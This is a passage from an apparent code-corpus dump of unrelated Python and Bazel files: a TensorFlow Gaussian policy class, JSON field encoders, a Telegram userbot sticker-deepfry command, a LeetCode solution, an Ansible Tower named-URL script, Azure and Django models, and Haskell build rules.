maintain a linear activation.\n output_w_init (callable): Initializer function for the weight\n of output dense layer(s). The function should return a\n tf.Tensor.\n output_b_init (callable): Initializer function for the bias\n of output dense layer(s). The function should return a\n tf.Tensor.\n learn_std (bool): Is std trainable.\n adaptive_std (bool): Is std a neural network. If False, it will be a\n parameter.\n std_share_network (bool): Boolean for whether mean and std share\n the same network.\n init_std (float): Initial value for std.\n std_hidden_sizes (list[int]): Output dimension of dense layer(s) for\n the MLP for std. For example, (32, 32) means the MLP consists\n of two hidden layers, each with 32 hidden units.\n min_std (float): If not None, the std is at least the value of min_std,\n to avoid numerical issues.\n max_std (float): If not None, the std is at most the value of max_std,\n to avoid numerical issues.\n std_hidden_nonlinearity (callable): Nonlinearity for each hidden layer\n in the std network. 
The function should return a tf.Tensor.\n std_output_nonlinearity (callable): Nonlinearity for output layer in\n the std network. The function should return a\n tf.Tensor.\n std_parameterization (str): How the std should be parametrized. There\n are a few options:\n - exp: the logarithm of the std will be stored, and applied a\n exponential transformation\n - softplus: the std will be computed as log(1+exp(x))\n layer_normalization (bool): Bool for using layer normalization or not.\n\n \"\"\"\n\n def __init__(self,\n env_spec,\n name='GaussianMLPPolicy',\n hidden_sizes=(32, 32),\n hidden_nonlinearity=tf.nn.tanh,\n hidden_w_init=tf.initializers.glorot_uniform(),\n hidden_b_init=tf.zeros_initializer(),\n output_nonlinearity=None,\n output_w_init=tf.initializers.glorot_uniform(),\n output_b_init=tf.zeros_initializer(),\n learn_std=True,\n adaptive_std=False,\n std_share_network=False,\n init_std=1.0,\n min_std=1e-6,\n max_std=None,\n std_hidden_sizes=(32, 32),\n std_hidden_nonlinearity=tf.nn.tanh,\n std_output_nonlinearity=None,\n std_parameterization='exp',\n layer_normalization=False):\n if not isinstance(env_spec.action_space, akro.Box):\n raise ValueError('GaussianMLPPolicy only works with '\n 'akro.Box action space, but not {}'.format(\n env_spec.action_space))\n super().__init__(name, env_spec)\n self._obs_dim = env_spec.observation_space.flat_dim\n self._action_dim = env_spec.action_space.flat_dim\n\n self._hidden_sizes = hidden_sizes\n self._hidden_nonlinearity = hidden_nonlinearity\n self._hidden_w_init = hidden_w_init\n self._hidden_b_init = hidden_b_init\n self._output_nonlinearity = output_nonlinearity\n self._output_w_init = output_w_init\n self._output_b_init = output_b_init\n self._learn_std = learn_std\n self._adaptive_std = adaptive_std\n self._std_share_network = std_share_network\n self._init_std = init_std\n self._min_std = min_std\n self._max_std = max_std\n self._std_hidden_sizes = std_hidden_sizes\n self._std_hidden_nonlinearity = std_hidden_nonlinearity\n self._std_output_nonlinearity = std_output_nonlinearity\n self._std_parameterization = std_parameterization\n self._layer_normalization = layer_normalization\n\n self._f_dist = None\n self._dist = None\n\n self.model = GaussianMLPModel(\n output_dim=self._action_dim,\n hidden_sizes=hidden_sizes,\n hidden_nonlinearity=hidden_nonlinearity,\n hidden_w_init=hidden_w_init,\n hidden_b_init=hidden_b_init,\n output_nonlinearity=output_nonlinearity,\n output_w_init=output_w_init,\n output_b_init=output_b_init,\n learn_std=learn_std,\n adaptive_std=adaptive_std,\n std_share_network=std_share_network,\n init_std=init_std,\n min_std=min_std,\n max_std=max_std,\n std_hidden_sizes=std_hidden_sizes,\n std_hidden_nonlinearity=std_hidden_nonlinearity,\n std_output_nonlinearity=std_output_nonlinearity,\n std_parameterization=std_parameterization,\n layer_normalization=layer_normalization,\n name='GaussianMLPModel')\n\n self._initialize()\n\n def _initialize(self):\n \"\"\"Initialize policy.\"\"\"\n with tf.compat.v1.variable_scope(self.name) as vs:\n self._variable_scope = vs\n state_input = tf.compat.v1.placeholder(tf.float32,\n shape=(None, None,\n self._obs_dim))\n self._dist, mean, log_std = self.model.build(state_input).outputs\n self._f_dist = tf.compat.v1.get_default_session().make_callable(\n [self._dist.sample(), mean, log_std], feed_list=[state_input])\n\n @property\n def input_dim(self):\n \"\"\"int: Dimension of the policy input.\"\"\"\n return self._obs_dim\n\n def build(self, state_input, name=None):\n \"\"\"Build 
policy.\n\n Args:\n state_input (tf.Tensor) : State input.\n name (str): Name of the policy, which is also the name scope.\n\n Returns:\n tfp.distributions.MultivariateNormalDiag: Distribution.\n tf.tensor: Mean.\n tf.Tensor: Log of standard deviation.\n\n \"\"\"\n with tf.compat.v1.variable_scope(self._variable_scope):\n return self.model.build(state_input, name=name)\n\n @property\n def vectorized(self):\n \"\"\"Vectorized or not.\n\n Returns:\n Bool: True if primitive supports vectorized operations.\n\n \"\"\"\n return True\n\n def get_action(self, observation):\n \"\"\"Get single action from this policy for the input observation.\n\n Args:\n observation (numpy.ndarray): Observation from environment.\n\n Returns:\n numpy.ndarray: Actions\n dict: Predicted action and agent information.\n\n Note:\n It returns an action and a dict, with keys\n - mean (numpy.ndarray): Mean of the distribution.\n - log_std (numpy.ndarray): Log standard deviation of the\n distribution.\n\n \"\"\"\n sample, mean, log_std = self._f_dist(np.expand_dims([observation], 1))\n sample = self.action_space.unflatten(np.squeeze(sample, 1)[0])\n mean = self.action_space.unflatten(np.squeeze(mean, 1)[0])\n log_std = self.action_space.unflatten(np.squeeze(log_std, 1)[0])\n return sample, dict(mean=mean, log_std=log_std)\n\n def get_actions(self, observations):\n \"\"\"Get multiple actions from this policy for the input observations.\n\n Args:\n observations (numpy.ndarray): Observations from environment.\n\n Returns:\n numpy.ndarray: Actions\n dict: Predicted action and agent information.\n\n Note:\n It returns actions and a dict, with keys\n - mean (numpy.ndarray): Means of the distribution.\n - log_std (numpy.ndarray): Log standard deviations of the\n distribution.\n\n \"\"\"\n samples, means, log_stds = self._f_dist(np.expand_dims(\n observations, 1))\n samples = self.action_space.unflatten_n(np.squeeze(samples, 1))\n means = self.action_space.unflatten_n(np.squeeze(means, 1))\n log_stds = self.action_space.unflatten_n(np.squeeze(log_stds, 1))\n return samples, dict(mean=means, log_std=log_stds)\n\n @property\n def distribution(self):\n \"\"\"Policy distribution.\n\n Returns:\n tfp.Distribution.MultivariateNormalDiag: Policy distribution.\n\n \"\"\"\n return self._dist\n\n def clone(self, name):\n \"\"\"Return a clone of the policy.\n\n It only copies the configuration of the primitive,\n not the parameters.\n\n Args:\n name (str): Name of the newly created policy. 
It has to be\n different from source policy if cloned under the same\n computational graph.\n\n Returns:\n garage.tf.policies.GaussianMLPPolicy: Newly cloned policy.\n\n \"\"\"\n return self.__class__(\n name=name,\n env_spec=self._env_spec,\n hidden_sizes=self._hidden_sizes,\n hidden_nonlinearity=self._hidden_nonlinearity,\n hidden_w_init=self._hidden_w_init,\n hidden_b_init=self._hidden_b_init,\n output_nonlinearity=self._output_nonlinearity,\n output_w_init=self._output_w_init,\n output_b_init=self._output_b_init,\n learn_std=self._learn_std,\n adaptive_std=self._adaptive_std,\n std_share_network=self._std_share_network,\n init_std=self._init_std,\n min_std=self._min_std,\n max_std=self._max_std,\n std_hidden_sizes=self._std_hidden_sizes,\n std_hidden_nonlinearity=self._std_hidden_nonlinearity,\n std_output_nonlinearity=self._std_output_nonlinearity,\n std_parameterization=self._std_parameterization,\n layer_normalization=self._layer_normalization)\n\n def __getstate__(self):\n \"\"\"Object.__getstate__.\n\n Returns:\n dict: the state to be pickled for the instance.\n\n \"\"\"\n new_dict = super().__getstate__()\n del new_dict['_f_dist']\n del new_dict['_dist']\n return new_dict\n\n def __setstate__(self, state):\n \"\"\"Object.__setstate__.\n\n Args:\n state (dict): Unpickled state.\n\n \"\"\"\n super().__setstate__(state)\n self._initialize()\n"} {"ext": "py", "sha": "1a3120b9c15a59170503cbe409ce3994c30fddc4", "content": "# never name this package \"types\", or mypy will crash in ugly ways\nfrom hologram import (\n FieldEncoder, JsonSchemaMixin, JsonDict, ValidationError\n)\n\nfrom datetime import timedelta\nfrom typing import NewType\n\n\nPort = NewType('Port', int)\n\n\nclass PortEncoder(FieldEncoder):\n @property\n def json_schema(self):\n return {'type': 'integer', 'minimum': 0, 'maximum': 65535}\n\n\nclass TimeDeltaFieldEncoder(FieldEncoder[timedelta]):\n \"\"\"Encodes timedeltas to dictionaries\"\"\"\n\n def to_wire(self, value: timedelta) -> float:\n return value.total_seconds()\n\n def to_python(self, value) -> timedelta:\n if isinstance(value, timedelta):\n return value\n try:\n return timedelta(seconds=value)\n except TypeError:\n raise ValidationError(\n 'cannot encode {} into timedelta'.format(value)\n ) from None\n\n @property\n def json_schema(self) -> JsonDict:\n return {'type': 'number'}\n\n\nJsonSchemaMixin.register_field_encoders({\n Port: PortEncoder(),\n timedelta: TimeDeltaFieldEncoder()\n})\n"} {"ext": "py", "sha": "1a31220ea5ef7ebf8b9ed118138ac41a58285c32", "content": "\n# Copyright (C) 2019 The Raphielscape Company LLC.\n#\n# Licensed under the Raphielscape Public License, Version 1.d (the \"License\");\n# you may not use this file except in compliance with the License.\n#\n\n# Original source for the deepfrying code (used under the following\n# license): https://github.com/Ovyerus/deeppyer\n\n# MIT License\n#\n# Copyright (c) 2017 Ovyerus\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", 
WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n# Ported from Xtra-telegram by @heyworld\n\n# KING USERBOT\n\nimport os\nfrom telethon.errors.rpcerrorlist import YouBlockedUserError\n\nfrom userbot.events import register\nfrom userbot import bot, TEMP_DOWNLOAD_DIRECTORY, CMD_HELP\n\n\n@register(outgoing=True, pattern=r'^.kekuatan(:? |$)([1-8])?')\nasync def _(fry):\n await fry.edit(\"`King Mengaktifkan Kekuatan Telegram...⚡`\")\n level = fry.pattern_match.group(2)\n if fry.fwd_from:\n return\n if not fry.reply_to_msg_id:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n reply_message = await fry.get_reply_message()\n if not reply_message.media:\n await fry.edit(\"`Gambar tidak di dukung`\")\n return\n if reply_message.sender.bot:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n chat = \"@image_deepfrybot\"\n message_id_to_reply = fry.message.reply_to_msg_id\n async with fry.client.conversation(chat) as conv:\n try:\n msg = await conv.send_message(reply_message)\n if level:\n m = f\"/deepfry {level}\"\n msg_level = await conv.send_message(\n m,\n reply_to=msg.id)\n r = await conv.get_response()\n response = await conv.get_response()\n else:\n response = await conv.get_response()\n \"\"\" - don't spam notif - \"\"\"\n await bot.send_read_acknowledge(conv.chat_id)\n except YouBlockedUserError:\n await fry.reply(\"`King Mohon Unblock` @image_deepfrybot`...`\")\n return\n if response.text.startswith(\"Forward\"):\n await fry.edit(\"`King Mohon Matikan Setelan Forward Privasi...`\")\n else:\n downloaded_file_name = await fry.client.download_media(\n response.media,\n TEMP_DOWNLOAD_DIRECTORY\n )\n await fry.client.send_file(\n fry.chat_id,\n downloaded_file_name,\n force_document=False,\n reply_to=message_id_to_reply\n )\n \"\"\" - cleanup chat after completed - \"\"\"\n try:\n msg_level\n except NameError:\n await fry.client.delete_messages(conv.chat_id,\n [msg.id, response.id])\n else:\n await fry.client.delete_messages(\n conv.chat_id,\n [msg.id, response.id, r.id, msg_level.id])\n await fry.delete()\n return os.remove(downloaded_file_name)\n\n\n@register(outgoing=True, pattern=r'^.df(:? 
|$)([1-8])?')\nasync def _(fry):\n await fry.edit(\"`Sedang Dalam Proses......`\")\n level = fry.pattern_match.group(2)\n if fry.fwd_from:\n return\n if not fry.reply_to_msg_id:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n reply_message = await fry.get_reply_message()\n if not reply_message.media:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n if reply_message.sender.bot:\n await fry.edit(\"`Mohon Balas Di Sticker King`\")\n return\n chat = \"@image_deepfrybot\"\n message_id_to_reply = fry.message.reply_to_msg_id\n async with fry.client.conversation(chat) as conv:\n try:\n msg = await conv.send_message(reply_message)\n if level:\n m = f\"/deepfry {level}\"\n msg_level = await conv.send_message(\n m,\n reply_to=msg.id)\n r = await conv.get_response()\n response = await conv.get_response()\n else:\n response = await conv.get_response()\n \"\"\" - don't spam notif - \"\"\"\n await bot.send_read_acknowledge(conv.chat_id)\n except YouBlockedUserError:\n await fry.reply(\"`King Mohon Unblock` @image_deepfrybot`...`\")\n return\n if response.text.startswith(\"Forward\"):\n await fry.edit(\"`King Mohon Matikan Setelan Privasi Forward...`\")\n else:\n downloaded_file_name = await fry.client.download_media(\n response.media,\n TEMP_DOWNLOAD_DIRECTORY\n )\n await fry.client.send_file(\n fry.chat_id,\n downloaded_file_name,\n force_document=False,\n reply_to=message_id_to_reply\n )\n \"\"\" - cleanup chat after completed - \"\"\"\n try:\n msg_level\n except NameError:\n await fry.client.delete_messages(conv.chat_id,\n [msg.id, response.id])\n else:\n await fry.client.delete_messages(\n conv.chat_id,\n [msg.id, response.id, r.id, msg_level.id])\n await fry.delete()\n return os.remove(downloaded_file_name)\n\n\nCMD_HELP.update({\n \"kekuatan\":\n \"**Modules: __Kekuatan__\\n\\n⚡𝘾𝙈𝘿⚡: `.kekuatan` / `.kekuatan [level(1-8)]`\"\n \"\\n**Penjelasan:** untuk mengubah foto/sticker.\"\n})\n"} {"ext": "py", "sha": "1a312242c7dee2b9a7e6b1e22412161f90d85d84", "content": "from collections import Counter\nclass Solution:\n def removeDuplicateLetters(self, s: str) -> str:\n counter = Counter(s)\n seen = set()\n stack = []\n \n for letter in s:\n counter[letter] -= 1\n \n if letter in seen:\n continue\n \n while stack and stack[-1] > letter and counter[stack[-1]] > 0:\n seen.remove(stack.pop())\n \n stack.append(letter)\n seen.add(letter)\n \n return \"\".join(stack)\n"} {"ext": "py", "sha": "1a31236e0d3942882dcfcbd16cb03a0df595a349", "content": "#!/usr/bin/env python\nimport argparse\nimport six\n\nimport requests\n\n\nNAMED_URL_RES_DILIMITER = \"--\"\nNAMED_URL_RES_INNER_DILIMITER = \"-\"\nNAMED_URL_RES_DILIMITER_ENCODE = \"%2D\"\nURL_PATH_RESERVED_CHARSET = {}\nfor c in ';/?:@=&[]':\n URL_PATH_RESERVED_CHARSET[c] = six.moves.urllib.parse.quote(c, safe='')\n\n\ndef _get_named_url_graph(url, auth):\n \"\"\"Get the graph data structure Tower used to manage all named URLs.\n\n Args:\n url: String representing the URL of tower configuration endpoint where\n to fetch graph information.\n auth: Tuple of username + password to authenticate connection to Tower.\n\n Return:\n A dict of graph nodes that in ensembly represent the graph structure. 
Each\n node is represented as a dict of 'fields' and 'adj_list'.\n\n Raises:\n N/A\n \"\"\"\n r = requests.get(url, auth=auth, verify=False)\n ret = r.json()['NAMED_URL_GRAPH_NODES']\n return ret\n\n\ndef _encode_uri(text):\n \"\"\"Properly encode input text to make it satisfy named URL convention.\n\n Args:\n text: the original string to be encoded.\n\n Return:\n The encoded string\n\n Raises:\n N/A\n \"\"\"\n for c in URL_PATH_RESERVED_CHARSET:\n if c in text:\n text = text.replace(c, URL_PATH_RESERVED_CHARSET[c])\n text = text.replace(NAMED_URL_RES_INNER_DILIMITER,\n '[%s]' % NAMED_URL_RES_INNER_DILIMITER)\n return text\n\n\ndef _generate_identifier_component(response, fields):\n \"\"\"Generate an individual component of named URL identifier.\n\n Args:\n response: JSON containing the details of a particular resource object.\n fields: name of resource object fields needed to generate a named URL\n identifier component.\n\n Return:\n A string representing generated identifier component.\n\n Raises:\n N/A\n \"\"\"\n ret = []\n for field_name in fields:\n ret.append(_encode_uri(response[field_name]))\n return NAMED_URL_RES_INNER_DILIMITER.join(ret)\n\n\ndef _get_named_url_identifier(url, named_url_graph, resource, tower_host, auth, ret):\n \"\"\"DFS the named URL graph structure to generate identifier for a resource object.\n\n Args:\n url: A string used to access a particular resource object to generate identifier\n component from.\n named_url_graph: The graph structure used to DFS against.\n resource: Key name of the current graph node.\n tower_host: String representing the host name of Tower backend.\n auth: Tuple of username + password to authenticate connection to Tower.\n ret: list of strings storing components that would later be joined into\n the final named URL identifier.\n\n Return:\n None. Note the actual outcome is stored in argument ret due to the recursive\n nature of this function.\n\n Raises:\n \"\"\"\n r = requests.get(url, auth=auth, verify=False).json()\n ret.append(_generate_identifier_component(r, named_url_graph[resource]['fields']))\n for next_ in named_url_graph[resource]['adj_list']:\n next_fk, next_res = tuple(next_)\n if next_fk in r['related']:\n _get_named_url_identifier(tower_host.strip('/') + r['related'][next_fk],\n named_url_graph, next_res, tower_host, auth, ret)\n else:\n ret.append('')\n\n\ndef main(username=None, password=None, tower_host=None, resource=None, pk=None):\n \"\"\"Main function for generating and printing named URL of a resource object given its pk.\n\n Args:\n username: String representing the username needed to authenticating Tower.\n password: String representing the password needed to authenticating Tower.\n tower_host: String representing the host name of Tower backend.\n resource: REST API name of a specific resource, e.g. 
name for resource inventory\n is 'inventories'.\n pk: Primary key of the resource object whose named URL will be derived.\n\n Returns:\n None\n\n Raises:\n N/A\n \"\"\"\n start_url = '%s/api/v2/%s/%s/' % (tower_host.strip('/'), resource.strip('/'), pk)\n conf_url = '%s/api/v2/settings/named-url/' % tower_host.strip('/')\n auth = (username, password)\n named_url_graph = _get_named_url_graph(conf_url, auth)\n named_url_identifier = []\n _get_named_url_identifier(start_url, named_url_graph, resource,\n tower_host, auth, named_url_identifier)\n print('%s/api/v2/%s/%s/' % (tower_host.strip('/'), resource.strip('/'),\n NAMED_URL_RES_DILIMITER.join(named_url_identifier)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', type=str, required=True,\n help='Name of the Tower user for making requests',\n dest='username', metavar='STR')\n parser.add_argument('--password', type=str, required=True,\n help='Password of the Tower user for making requests',\n dest='password', metavar='STR')\n parser.add_argument('--tower-host', type=str, required=True,\n help='Tower host name, like \"http://127.0.0.1\"',\n dest='tower_host', metavar='STR')\n parser.add_argument('--resource', type=str, required=True,\n help='Name of the resource in REST endpoints',\n dest='resource', metavar='STR')\n parser.add_argument('--pk', type=int, required=True,\n help='Primary key of resource object whose named URL will be derived',\n dest='pk', metavar='INT')\n main(**vars(parser.parse_args()))\n"} {"ext": "py", "sha": "1a31245a4a0cb45323077cf7454190ca2e1a537d", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ConnectionMonitorResult(Model):\n \"\"\"Information about the connection monitor.\n\n Variables are only populated by the server, and will be ignored when\n sending a request.\n\n All required parameters must be populated in order to send to Azure.\n\n :ivar name: Name of the connection monitor.\n :vartype name: str\n :ivar id: ID of the connection monitor.\n :vartype id: str\n :param etag: Default value: \"A unique read-only string that changes\n whenever the resource is updated.\" .\n :type etag: str\n :ivar type: Connection monitor type.\n :vartype type: str\n :param location: Connection monitor location.\n :type location: str\n :param tags: Connection monitor tags.\n :type tags: dict[str, str]\n :param source: Required.\n :type source:\n ~azure.mgmt.network.v2017_11_01.models.ConnectionMonitorSource\n :param destination: Required.\n :type destination:\n ~azure.mgmt.network.v2017_11_01.models.ConnectionMonitorDestination\n :param auto_start: Determines if the connection monitor will start\n automatically once created. Default value: True .\n :type auto_start: bool\n :param monitoring_interval_in_seconds: Monitoring interval in seconds.\n Default value: 60 .\n :type monitoring_interval_in_seconds: int\n :param provisioning_state: The provisioning state of the connection\n monitor. 
Possible values include: 'Succeeded', 'Updating', 'Deleting',\n 'Failed'\n :type provisioning_state: str or\n ~azure.mgmt.network.v2017_11_01.models.ProvisioningState\n :param start_time: The date and time when the connection monitor was\n started.\n :type start_time: datetime\n :param monitoring_status: The monitoring status of the connection monitor.\n :type monitoring_status: str\n \"\"\"\n\n _validation = {\n 'name': {'readonly': True},\n 'id': {'readonly': True},\n 'type': {'readonly': True},\n 'source': {'required': True},\n 'destination': {'required': True},\n }\n\n _attribute_map = {\n 'name': {'key': 'name', 'type': 'str'},\n 'id': {'key': 'id', 'type': 'str'},\n 'etag': {'key': 'etag', 'type': 'str'},\n 'type': {'key': 'type', 'type': 'str'},\n 'location': {'key': 'location', 'type': 'str'},\n 'tags': {'key': 'tags', 'type': '{str}'},\n 'source': {'key': 'properties.source', 'type': 'ConnectionMonitorSource'},\n 'destination': {'key': 'properties.destination', 'type': 'ConnectionMonitorDestination'},\n 'auto_start': {'key': 'properties.autoStart', 'type': 'bool'},\n 'monitoring_interval_in_seconds': {'key': 'properties.monitoringIntervalInSeconds', 'type': 'int'},\n 'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},\n 'start_time': {'key': 'properties.startTime', 'type': 'iso-8601'},\n 'monitoring_status': {'key': 'properties.monitoringStatus', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(ConnectionMonitorResult, self).__init__(**kwargs)\n self.name = None\n self.id = None\n self.etag = kwargs.get('etag', \"A unique read-only string that changes whenever the resource is updated.\")\n self.type = None\n self.location = kwargs.get('location', None)\n self.tags = kwargs.get('tags', None)\n self.source = kwargs.get('source', None)\n self.destination = kwargs.get('destination', None)\n self.auto_start = kwargs.get('auto_start', True)\n self.monitoring_interval_in_seconds = kwargs.get('monitoring_interval_in_seconds', 60)\n self.provisioning_state = kwargs.get('provisioning_state', None)\n self.start_time = kwargs.get('start_time', None)\n self.monitoring_status = kwargs.get('monitoring_status', None)\n"} {"ext": "py", "sha": "1a31246fb0511e1af29e081496c47cec931f0079", "content": "from django.db.models.signals import pre_save, post_delete\nfrom django.dispatch import receiver\nfrom .serializers import XXTMP_PO_HEADERS, ElasticPO_headersSerializer\n\n\n@receiver(pre_save, sender=XXTMP_PO_HEADERS, dispatch_uid=\"update_record\")\ndef update_es_record(sender, instance, **kwargs):\n obj = ElasticPO_headersSerializer(instance)\n obj.save()\n\n\n@receiver(post_delete, sender=XXTMP_PO_HEADERS, dispatch_uid=\"delete_record\")\ndef delete_es_record(sender, instance, *args, **kwargs):\n obj = ElasticPO_headersSerializer(instance)\n obj.delete(ignore=404)\n"} {"ext": "py", "sha": "1a3124710842e08574b7d0b22373bdfce04a0c52", "content": "# Generated by Django 2.2.13 on 2020-07-21 23:29\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('scales', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='scale',\n name='created_at',\n field=models.TimeField(default=datetime.datetime(2020, 7, 21, 23, 29, 11, 517956), editable=False),\n ),\n migrations.AlterField(\n model_name='scale',\n name='created_when',\n field=models.DateField(default=datetime.datetime(2020, 7, 21, 23, 29, 11, 517998), editable=False),\n ),\n ]\n"} {"ext": "py", "sha": 
"1a31249dd4025a966d8f9e01d3235e3a9810453b", "content": "# This file is MACHINE GENERATED! Do not edit.\n# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.\n\"\"\"Public API for tf.keras.applications.densenet namespace.\n\"\"\"\n\nfrom __future__ import print_function as _print_function\n\nimport sys as _sys\n\nfrom keras.applications.densenet import DenseNet121\nfrom keras.applications.densenet import DenseNet169\nfrom keras.applications.densenet import DenseNet201\nfrom keras.applications.densenet import decode_predictions\nfrom keras.applications.densenet import preprocess_input\n\ndel _print_function\n"} {"ext": "bzl", "sha": "1a312549920f465562521a5e820a0bcecda9f0bf", "content": "\"\"\"Implementation of core Haskell rules\"\"\"\n\nload(\"@bazel_skylib//lib:dicts.bzl\", \"dicts\")\nload(\n \":providers.bzl\",\n \"C2hsLibraryInfo\",\n \"HaddockInfo\",\n \"HaskellInfo\",\n \"HaskellLibraryInfo\",\n \"HaskellToolchainLibraryInfo\",\n \"all_dependencies_package_ids\",\n)\nload(\":cc.bzl\", \"cc_interop_info\")\nload(\n \":private/actions/info.bzl\",\n \"compile_info_output_groups\",\n \"library_info_output_groups\",\n)\nload(\n \":private/actions/link.bzl\",\n \"link_binary\",\n \"link_library_dynamic\",\n \"link_library_static\",\n)\nload(\":private/actions/package.bzl\", \"package\")\nload(\":private/plugins.bzl\", \"resolve_plugin_tools\")\nload(\":private/actions/runghc.bzl\", \"build_haskell_runghc\")\nload(\":private/context.bzl\", \"haskell_context\")\nload(\":private/dependencies.bzl\", \"gather_dep_info\")\nload(\":private/expansions.bzl\", \"expand_make_variables\", \"haskell_library_extra_label_attrs\")\nload(\":private/java.bzl\", \"java_interop_info\")\nload(\":private/mode.bzl\", \"is_profiling_enabled\")\nload(\n \":private/path_utils.bzl\",\n \"determine_module_names\",\n \"get_dynamic_hs_lib_name\",\n \"get_lib_extension\",\n \"get_static_hs_lib_name\",\n \"infer_main_module\",\n \"ln\",\n \"match_label\",\n \"parse_pattern\",\n)\nload(\":private/pkg_id.bzl\", \"pkg_id\")\nload(\":private/set.bzl\", \"set\")\nload(\":private/list.bzl\", \"list\")\nload(\":private/version_macros.bzl\", \"generate_version_macros\")\nload(\":providers.bzl\", \"GhcPluginInfo\", \"HaskellCoverageInfo\")\nload(\"@bazel_skylib//lib:paths.bzl\", \"paths\")\nload(\"@bazel_skylib//lib:collections.bzl\", \"collections\")\nload(\"@bazel_skylib//lib:shell.bzl\", \"shell\")\nload(\"@rules_cc//cc:find_cc_toolchain.bzl\", \"find_cc_toolchain\")\nload(\"//haskell/experimental:providers.bzl\", \"HaskellModuleInfo\")\nload(\"//haskell/experimental/private:module.bzl\", \"build_haskell_modules\", \"get_module_path_from_target\")\n\n# Note [Empty Libraries]\n#\n# GHC 8.10.x wants to load the shared libraries corresponding to packages needed\n# for running TemplateHaskell splices. It wants to do this even when all the\n# necessary object files are passed in the command line.\n#\n# In order to satisfy GHC, and yet avoid passing the linked library as input, we\n# create a ficticious package which points to an empty shared library. 
The\n# ficticious and the real package share the same interface files.\n#\n# Avoiding to pass the real shared library as input is necessary when building\n# individual modules with haskell_module, otherwise building the module would\n# need to wait until all of the modules of library dependencies have been built.\n#\n# See Note [Narrowed Dependencies] for an overview of what this feature is\n# needed for.\n\ndef _prepare_srcs(srcs):\n srcs_files = []\n import_dir_map = {}\n\n for src in srcs:\n # If it has the \"files\" attribute, it must be a Target\n if hasattr(src, \"files\"):\n if C2hsLibraryInfo in src:\n srcs_files += src.files.to_list()\n for f in src.files.to_list():\n import_dir_map[f] = src[C2hsLibraryInfo].import_dir\n else:\n srcs_files += src.files.to_list()\n\n # otherwise it's just a file\n\n else:\n srcs_files.append(src)\n\n return srcs_files, import_dir_map\n\ndef haskell_test_impl(ctx):\n return _haskell_binary_common_impl(ctx, is_test = True)\n\ndef haskell_binary_impl(ctx):\n return _haskell_binary_common_impl(ctx, is_test = False)\n\ndef _should_inspect_coverage(ctx, hs, is_test):\n return hs.coverage_enabled and is_test\n\ndef _coverage_enabled_for_target(coverage_source_patterns, label):\n for pat in coverage_source_patterns:\n if match_label(pat, label):\n return True\n\n return False\n\n# Mix files refer to genfile srcs including their root. Therefore, we\n# must condition the src filepaths passed in for coverage to match.\ndef _condition_coverage_src(hs, src):\n if not src.path.startswith(hs.genfiles_dir.path):\n return src\n\n \"\"\" Genfiles have the genfile directory as part of their path,\n so declaring a file with the sample path actually makes the new\n file double-qualified by the genfile directory.\n\n This is necessary because mix files capture the genfile\n path before compilation, and then expect those files to be\n qualified by the genfile directory when `hpc report` or\n `hpc markup` are used. But, genfiles included as runfiles\n are no longer qualified. 
So, double-qualifying them results in\n only one level of qualification as runfiles.\n \"\"\"\n conditioned_src = hs.actions.declare_file(src.path)\n hs.actions.run_shell(\n inputs = [src],\n outputs = [conditioned_src],\n arguments = [\n src.path,\n conditioned_src.path,\n ],\n command = \"\"\"\n mkdir -p $(dirname \"$2\") && cp \"$1\" \"$2\"\n \"\"\",\n )\n\n return conditioned_src\n\ndef _resolve_preprocessors(ctx, preprocessors):\n if not hasattr(ctx, \"resolve_tools\"):\n # No resolve_tools when ctx is faked (see protobuf.bzl).\n return struct(\n inputs = depset(),\n input_manifests = [],\n )\n (inputs, input_manifests) = ctx.resolve_tools(tools = preprocessors)\n return struct(\n inputs = inputs,\n input_manifests = input_manifests,\n )\n\ndef _expand_make_variables(name, ctx, strings):\n # All labels in all attributes should be location-expandable.\n return expand_make_variables(name, ctx, strings, haskell_library_extra_label_attrs(ctx.attr))\n\ndef haskell_module_from_target(m):\n \"\"\" Produces the module name from a HaskellModuleInfo \"\"\"\n return paths.split_extension(get_module_path_from_target(m))[0].replace(\"/\", \".\")\n\ndef is_main_as_haskell_module(modules, main_function):\n main_module = infer_main_module(main_function).replace(\".\", \"/\")\n for m in modules:\n if haskell_module_from_target(m) == main_module:\n return True\n return False\n\ndef _haskell_binary_common_impl(ctx, is_test):\n hs = haskell_context(ctx)\n deps = ctx.attr.deps + ctx.attr.narrowed_deps\n dep_info = gather_dep_info(ctx.attr.name, ctx.attr.deps)\n all_deps_info = gather_dep_info(ctx.attr.name, deps)\n\n modules = ctx.attr.modules\n if modules and ctx.files.srcs:\n fail(\"\"\"Only one of \"srcs\" or \"modules\" attributes must be specified in 